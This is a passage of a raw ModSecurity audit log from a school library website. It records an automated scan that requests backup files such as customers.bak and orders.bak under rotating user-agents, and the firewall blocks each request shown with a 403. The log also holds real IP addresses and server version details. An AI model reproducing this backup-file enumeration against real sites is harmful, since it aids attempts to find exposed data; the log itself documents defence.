"TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200721030 1967 (- - -) Stopwatch2: 1747683200721030 1967; combined=726, p1=386, p2=317, p3=0, p4=0, p5=23, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54a6ae75-Z-- --1117220b-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOEmwAAANU 103.236.140.4 59174 103.236.140.4 8181 --1117220b-B-- GET /back.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159350802 --1117220b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1117220b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200721449 1790 (- - -) Stopwatch2: 1747683200721449 1790; combined=670, p1=352, p2=294, p3=0, p4=0, p5=24, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1117220b-Z-- --5e048505-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOEmQAAANc 103.236.140.4 58982 103.236.140.4 8181 --5e048505-B-- GET /com.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 OPR/60.0.3255.170 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 161775637 --5e048505-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5e048505-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200721228 5021 (- - -) Stopwatch2: 1747683200721228 5021; combined=790, p1=392, p2=368, p3=0, p4=0, p5=30, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e048505-Z-- --f8154b17-A-- [20/May/2025:02:33:20 +0700] aCuHgGyGBQNQTJej4E5-4wAAAIg 103.236.140.4 59064 103.236.140.4 8181 --f8154b17-B-- GET /www.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153681935 --f8154b17-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f8154b17-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200714732 12676 (- - -) Stopwatch2: 1747683200714732 12676; combined=621, p1=290, p2=302, p3=0, p4=0, p5=28, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8154b17-Z-- --32212a20-A-- [20/May/2025:02:33:20 +0700] aCuHgGyGBQNQTJej4E5-7wAAAIA 103.236.140.4 59144 103.236.140.4 8181 --32212a20-B-- GET /erpustakaan_smkn22jakarta_sch_id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164142304 --32212a20-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --32212a20-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200703157 24661 (- - -) Stopwatch2: 1747683200703157 24661; combined=668, p1=333, p2=302, p3=0, p4=0, p5=32, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32212a20-Z-- --13f51d16-A-- [20/May/2025:02:33:20 +0700] aCuHgDuVdcwZ_qZ5ZIonTAAAAAk 103.236.140.4 59702 103.236.140.4 8181 --13f51d16-B-- GET /customers.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686; rv:66.0.3) Gecko/20100101 Firefox/66.0.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127580981 --13f51d16-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --13f51d16-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200724811 8805 (- - -) Stopwatch2: 1747683200724811 8805; combined=673, p1=329, p2=304, p3=0, p4=0, p5=39, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13f51d16-Z-- --be216b77-A-- [20/May/2025:02:33:20 +0700] aCuHgGyGBQNQTJej4E5_CwAAAIo 103.236.140.4 59842 103.236.140.4 8181 --be216b77-B-- GET /engine.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165740547 --be216b77-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --be216b77-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200733852 1915 (- - -) Stopwatch2: 1747683200733852 1915; combined=714, p1=366, p2=315, p3=0, p4=0, p5=33, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be216b77-Z-- --843a7e47-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOEowAAANE 103.236.140.4 59764 103.236.140.4 8181 --843a7e47-B-- GET /2013.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:62.0.3) Gecko/20100101 Firefox/62.0.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 163348486 --843a7e47-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --843a7e47-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200727212 9126 (- - -) Stopwatch2: 1747683200727212 9126; combined=639, p1=319, p2=286, p3=0, p4=0, p5=33, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --843a7e47-Z-- --09c20a74-A-- [20/May/2025:02:33:20 +0700] aCuHgDuVdcwZ_qZ5ZIonTQAAABI 103.236.140.4 59712 103.236.140.4 8181 --09c20a74-B-- GET /erpustakaansmkn22jakartaschid.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.8.1) Gecko/20100101 Firefox/52.8.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 100177664 --09c20a74-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --09c20a74-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200724907 12256 (- - -) Stopwatch2: 1747683200724907 12256; combined=661, p1=318, p2=311, p3=0, p4=0, p5=32, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09c20a74-Z-- --c07c530b-A-- [20/May/2025:02:33:20 +0700] aCuHgDuVdcwZ_qZ5ZIonXQAAABA 103.236.140.4 59718 103.236.140.4 8181 --c07c530b-B-- GET /bak.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809 Safari/537.36 OPR/58.0.3135.107 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 93032131 --c07c530b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c07c530b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200739910 1653 (- - -) Stopwatch2: 1747683200739910 1653; combined=581, p1=272, p2=285, p3=0, p4=0, p5=23, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c07c530b-Z-- --9f3b982b-A-- [20/May/2025:02:33:20 +0700] aCuHgDuVdcwZ_qZ5ZIonYAAAABA 103.236.140.4 59750 103.236.140.4 8181 --9f3b982b-B-- GET /log.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 OPR/51.0.2830.55 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 161611788 --9f3b982b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9f3b982b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200741669 1571 (- - -) Stopwatch2: 1747683200741669 1571; combined=563, p1=271, p2=267, p3=0, p4=0, p5=24, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f3b982b-Z-- --1831b63b-A-- [20/May/2025:02:33:20 +0700] aCuHgAZaP57SewDBUi9niwAAAEM 103.236.140.4 59600 103.236.140.4 8181 --1831b63b-B-- GET /backups.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:52.1.1) Gecko/20100101 Firefox/52.1.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152961045 --1831b63b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1831b63b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200719709 27552 (- - -) Stopwatch2: 1747683200719709 27552; combined=656, p1=354, p2=277, p3=0, p4=0, p5=25, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1831b63b-Z-- --24d4053f-A-- [20/May/2025:02:33:20 +0700] aCuHgAZaP57SewDBUi9nkQAAAEo 103.236.140.4 59468 103.236.140.4 8181 --24d4053f-B-- GET /bin.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:52.3.0) Gecko/20100101 Firefox/52.3.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127933812 --24d4053f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --24d4053f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200748317 1736 (- - -) Stopwatch2: 1747683200748317 1736; combined=663, p1=307, p2=326, p3=0, p4=0, p5=29, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24d4053f-Z-- --c1016e24-A-- [20/May/2025:02:33:20 +0700] aCuHgAZaP57SewDBUi9nlgAAAEo 103.236.140.4 59464 103.236.140.4 8181 --c1016e24-B-- GET /orders.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.40 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 161087497 --c1016e24-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c1016e24-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200750152 2347 (- - -) Stopwatch2: 1747683200750152 2347; combined=1074, p1=305, p2=600, p3=0, p4=0, p5=168, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1016e24-Z-- --66b00018-A-- [20/May/2025:02:33:20 +0700] aCuHgGyGBQNQTJej4E5_LQAAAI0 103.236.140.4 59044 103.236.140.4 8181 --66b00018-B-- GET /smkn22jakarta_sch_id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.54 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 154992646 --66b00018-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --66b00018-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200750819 4688 (- - -) Stopwatch2: 1747683200750819 4688; combined=630, p1=296, p2=311, p3=0, p4=0, p5=23, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66b00018-Z-- --dc7a4503-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOEwwAAAMY 103.236.140.4 59764 103.236.140.4 8181 --dc7a4503-B-- GET /smkn22jakartaschid.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770 Safari/537.36 OPR/57.0.3098.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153976865 --dc7a4503-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --dc7a4503-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200742279 13367 (- - -) Stopwatch2: 1747683200742279 13367; combined=610, p1=288, p2=294, p3=0, p4=0, p5=27, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc7a4503-Z-- --f1014064-A-- [20/May/2025:02:33:20 +0700] aCuHgAZaP57SewDBUi9nngAAAFg 103.236.140.4 59846 103.236.140.4 8181 --f1014064-B-- GET /my.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 OPR/56.0.3051.52 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155451407 --f1014064-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f1014064-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200749731 7387 (- - -) Stopwatch2: 1747683200749731 7387; combined=577, p1=340, p2=220, p3=0, p4=0, p5=17, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1014064-Z-- --094c216e-A-- [20/May/2025:02:33:20 +0700] aCuHgDuVdcwZ_qZ5ZIondgAAABI 103.236.140.4 59702 103.236.140.4 8181 --094c216e-B-- GET /site.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: 